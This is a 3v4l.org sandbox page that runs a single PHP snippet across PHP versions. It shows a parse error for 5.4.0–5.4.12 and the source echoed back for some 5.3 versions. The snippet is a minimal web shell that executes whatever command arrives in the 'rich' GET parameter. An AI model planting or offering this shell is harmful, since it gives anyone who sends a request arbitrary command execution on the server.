3v4l.org

run code in 300+ PHP versions simultaneously
<?=`$_GET['rich']`?:die('trying')?>
Output for 5.4.0 - 5.4.12
Parse error: syntax error, unexpected '' (T_ENCAPSED_AND_WHITESPACE), expecting identifier (T_STRING) or variable (T_VARIABLE) or number (T_NUM_STRING) in MhDRK on line 1
Process exited with code 255.
Output for 5.3.25, 5.3.27 - 5.3.29
<?=`$_GET['rich']`?:die('trying')?>
Output for 5.3.0 - 5.3.24, 5.3.26
<?=`$_GET['rich']`?:die('trying')?>

preferences:
176.78 ms | 1395 KiB | 50 Q